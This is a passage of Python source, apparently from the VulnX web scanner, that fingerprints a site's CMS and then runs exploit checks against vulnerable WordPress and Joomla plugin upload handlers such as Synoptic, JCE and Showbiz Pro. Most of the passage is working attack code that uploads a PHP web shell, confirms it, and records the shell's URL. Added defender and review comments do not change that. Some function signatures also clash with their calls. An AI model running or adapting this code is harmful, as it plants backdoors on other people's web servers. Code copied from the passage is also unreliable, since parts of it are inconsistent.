    headers['Content_Type'] = 'multipart/form-data'
    form = {"qqfile": payload}
    vxpost(upload_url, form, headers, timeout)
    probe_url = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, timeout)
    if not re.findall("Vuln X", body):
        print(' %s Synoptic %s' % (que, failexploit))
        vulnresults.add('[FAILED] Synoptic')
        return
    print(' %s Synoptic %s %s' % (que, vulnexploit, probe_url))
    vulnresults.add('[SUCCESS] Synoptic -- Shell:' + probe_url)
def wp_synoptic(url, headers):
    """Two-argument variant of the Synoptic avatar-upload check.

    Same request pair as the four-argument form on this page, with the
    timeout fixed at 3 and the result only printed using the colour globals.

    Defender note: the handler lives under
    ``wp-content/themes/synoptic/lib/avatarupload/`` and the probe targets
    ``wp-content/uploads/markets/avatars/``.
    """
    upload_url = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
    payload = open('./shell/VulnX.php', 'rb')
    headers['Content_Type'] = 'multipart/form-data'
    form = {"qqfile": payload}
    vxpost(upload_url, form, headers, 3)
    probe_url = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
    body = vxget(probe_url, headers, 3)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' % (G, W, B, W, probe_url, W))
def joomla_comjce(url, headers):
    """Upload check against the JCE ``imgmanager`` plugin endpoint.

    The local file ``./shell/VulnX.gif`` is passed to ``vxpost`` (timeout
    15) together with an ``upload-dir`` of ``./../../``. A TCP socket is then
    created and ``connect`` is called on it, after which ``<url>/VulnX.gif``
    is fetched and the body searched for ``/image/gif/``.

    NOTE(review): ``sock.connect(url, 80)`` passes two positional arguments
    and a URL string, whereas ``socket.connect`` takes one address argument;
    the socket is also never used or closed afterwards -- confirm whether
    the statements after it were ever reached.

    Defender note: requests carrying
    ``option=com_jce&task=plugin&plugin=imgmanager`` are the signature of
    this check, and the probe targets a ``.gif`` in the web root.
    """
    headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
    upload_url = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
    form = {
        'upload-dir': './../../',
        'upload-overwrite': 0,
        'Filedata': [open('./shell/VulnX.gif', 'rb')],
        'action': 'Upload'
    }
    vxpost(upload_url, form, headers, 15)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    sock.connect(url, 80)
    probe_url = url + "/VulnX.gif"
    body = vxget(probe_url, headers, 3)
    if not re.findall(r'/image/gif/', body):
        print('%s [%s-%s] Com Jce%s ------- %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] Com Jce%s ------- %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def wp_showbiz(url, headers):
    """Two-argument variant of the Showbiz Pro ``update_plugin`` check.

    Same request pair as the four-argument form on this page, with the
    upload timeout fixed at 3 and the result only printed using the colour
    globals. A User-Agent is picked at random from a fixed list of six
    strings and written into the caller's ``headers``.

    NOTE(review): the follow-up ``vxget`` receives the form dict as its
    second argument and no timeout, unlike the other checks on this page.

    Defender note: the six User-Agent strings are static, so they can serve
    as a weak matching signal alongside the ``showbiz_ajax_action`` POST.
    """
    ajax_url = url + "/wp-admin/admin-ajax.php"

    def random_UserAgent():
        # Fixed pool; one entry is chosen per call.
        pool = [
            "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
            "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
            "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
            "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
            "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
        ]
        return random.choice(pool)

    headers['User-Agent'] = random_UserAgent()
    headers['Content_Type'] = 'multipart/form-data'
    form = {
        "action": "showbiz_ajax_action",
        "client_action": "update_plugin",
        "update_file": [open('./shell/VulnX.php', 'rb')]
    }
    vxpost(ajax_url, form, headers, 3)
    probe_url = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
    body = vxget(probe_url, form)
    if not re.findall("Vuln X", body):
        print('%s [%s-%s] Showbiz Pro%s ------------ %s FAIL%s' % (W, R, W, W, R, W))
        return
    print('%s [%s+%s] Showbiz Pro%s ------------ %s VULN%s' % (W, G, W, W, G, W))
    print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' % (G, W, B, W, probe_url, W))
def detect_cms():
    """Fingerprint the CMS behind the module-level ``url`` and dispatch checks.

    Three pages are fetched with ``vxget``: ``/smiley/1.gif``, ``/rss.xml``
    and the root URL. The first regex that matches decides the branch
    (Joomla, WordPress, Drupal, Prestashop, OpenCart, Magento, Lokomedia,
    else Unknown). Inside a branch, the module-level switches ``webinfo``,
    ``domaininfo``, ``cms``, ``scanports`` and ``exploit`` select which
    helpers run. All inputs are globals; nothing is returned.

    Defender note: the fingerprints are plain substrings of the response
    body (for example any page containing "Magento" or "wp-content"), and
    branch order decides ties, so the reported CMS can be wrong for pages
    that merely mention another product.

    NOTE(review): the page shows this function collapsed onto a few long
    lines; the nesting of the trailing prints in each branch is
    reconstructed -- confirm against the original layout.
    """
    # Target counter used only in the banner; shadows the builtin ``id``.
    id = 0
    lm = url + '/smiley/1.gif'
    lm_content = vxget(lm, headers)
    lm2 = url + '/rss.xml'
    lm2_content = vxget(lm2, headers)
    content = vxget(url, headers)

    # ---- Joomla: mootools script tag, /media/system/js/, com_content or "Joomla!" ----
    if re.search(
            re.compile(
                r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'
            ), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Joomla' % (good, W, end))
        print('------------------------------------------------')
        # Passive hosting lookup, only when requested.
        if webinfo:
            webhosting_info(hostinfo)
        # Related-domain lookup, only when requested.
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            # NOTE(review): the Joomla branch calls the Prestashop version helper.
            prestashop_version()
        # Port scan of the target host, only when requested.
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Joomla upload checks; per the original comment these come from
        # ./common/joomla_exploits.py.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))
            joomla_comjce(url, headers, timeout)
            joomla_comedia(url, headers, timeout)
            joomla_comjdownloads(url, headers, timeout)
            joomla_comjdownloads2(url, headers, timeout)
            joomla_fabrik2(url, headers, timeout)
            joomla_fabrik2_d(url, headers, timeout)
            joomla_foxcontact(url, headers, timeout)

    # ---- WordPress: "wp-content", "wordpress" or "xmlrpc.php" in the body ----
    elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Wordpress' % (good, W, end))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        if domaininfo:
            domain_info(subdomains)
        # Information grabbers; per the original comment these come from
        # ./common/grapwp.py. ``cms`` selects one of them, or 'all'.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            wp_version(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'themes':
            print(' %s Check CMS Info' % (run))
            wp_themes(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'user':
            print(' %s Check CMS Info' % (run))
            wp_user(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'plugins':
            print(' %s Check CMS Info' % (run))
            wp_plugin(url, headers, grabinfo)
            print("-----------------------------------------------")
        if cms == 'all':
            print(' %s Check CMS Info' % (run))
            wp_version(url, headers, grabinfo)
            wp_themes(url, headers, grabinfo)
            wp_user(url, headers, grabinfo)
            wp_plugin(url, headers, grabinfo)
            print("-----------------------------------------------")
        # Port scan of the target host, only when requested.
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %sPORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # vulnx -u http://example.com -e | vulnx -u http://example --exploit
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))
            # WordPress upload checks; per the original comment these come
            # from ./common/wp_exploits.py. Each one records its outcome in
            # ``vulnresults``.
            wp_wysija(url, headers, timeout, vulnresults)
            wp_blaze(url, headers, timeout, vulnresults)
            wp_synoptic(url, headers, timeout, vulnresults)
            wp_catpro(url, headers, timeout, vulnresults)
            wp_cherry(url, headers, timeout, vulnresults)
            wp_dm(url, headers, timeout, vulnresults)
            wp_fromcraft(url, headers, timeout, vulnresults)
            wp_jobmanager(url, headers, timeout, vulnresults)
            wp_showbiz(url, headers, timeout, vulnresults)
            wp_shop(url, headers, timeout, vulnresults)
            wp_powerzoomer(url, headers, timeout, vulnresults)
            wp_revslider(url, headers, timeout, vulnresults)
            wp_adsmanager(url, headers, timeout, vulnresults)
            wp_inboundiomarketing(url, headers, timeout, vulnresults)
            wp_adblockblocker(url, headers, timeout, vulnresults)
            wp_levoslideshow(url, headers, timeout, vulnresults)
            print("-----------------------------------------------")

    # ---- Drupal: "Drupal", "drupal", "sites/all" or "drupal.org" in the body ----
    elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Drupal' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # Related-domain lookup, only when requested.
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            drupal_version()
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no Drupal checks are called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))

    # ---- Prestashop: "Prestashop" or "prestashop" in the body ----
    elif re.search(re.compile(r'Prestashop|prestashop'), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s %sCMS :%s Prestashop' % (good, W, end))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # Related-domain lookup, only when requested.
        if domaininfo:
            domain_info(subdomains)
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
            prestashop_version()
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no Prestashop checks are called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))

    # ---- OpenCart: route=product / route=common / theme path / "OpenCart" ----
    elif re.search(
            re.compile(
                r'route=product|OpenCart|route=common|catalog/view/theme'),
            content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : OpenCart' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # Related-domain lookup, only when requested.
        if domaininfo:
            domain_info(subdomains)
        # Banner only; no version helper is called for OpenCart.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only the table header is printed; no OpenCart checks are called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))

    # ---- Magento: admin login text, the "dummy" form field, or "Magento" ----
    elif re.search(
            re.compile(
                r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'
            ), content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Magento' % (good))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # Related-domain lookup, only when requested.
        if domaininfo:
            domain_info(subdomains)
        # Banner only; no version helper is called for Magento.
        if cms == 'version':
            print(' %s Check CMS Info' % (run))
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        # Only headers are printed; no Magento checks are called here.
        if exploit:
            print(' %s Check Vulnerability\n' % (run))
            print(""" %sNAME %sSTATUS %sSHELL""" % (W, W, W))
            # NOTE(review): this print sits under the original "lokomedia"
            # comment but precedes the Lokomedia ``elif``; its nesting level
            # is reconstructed -- confirm.
            print(' %s Check Vulnerability' % (run))

    # ---- Lokomedia (1): "image/gif" found in the /smiley/1.gif response ----
    elif re.search(re.compile(r'image/gif'), lm_content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Lokomedia' % (good))
        print('------------------------------------------------')
        # Unlike the other branches, the domain lookup is unconditional here.
        domain_info(subdomains)
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        print(' %s Check Vulnerability' % (run))

    # ---- Lokomedia (2): "lokomedia" found in the /rss.xml response ----
    elif re.search(re.compile(r'lokomedia'), lm2_content):
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Lokomedia' % (good))
        print('------------------------------------------------')
        # Unlike the other branches, the domain lookup is unconditional here.
        domain_info(subdomains)
        if scanports:
            print(' %s Scanning Ports\n' % (run))
            print(""" %s PORTS %sSTATUS %sPROTO""" % (W, W, W))
            portscan(hostd(url))
            print("-----------------------------------------------")
        print(' %s Check Vulnerability' % (run))

    # ---- Unknown: no fingerprint matched; only the passive lookups can run ----
    else:
        print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
        print('------------------------------------------------')
        print(' %s looking for cms' % (que))
        print(' %s CMS : Unknown' % (bad))
        print('------------------------------------------------')
        if webinfo:
            webhosting_info(hostinfo)
        # Related-domain lookup, only when requested.
        if domaininfo:
            domain_info(subdomains)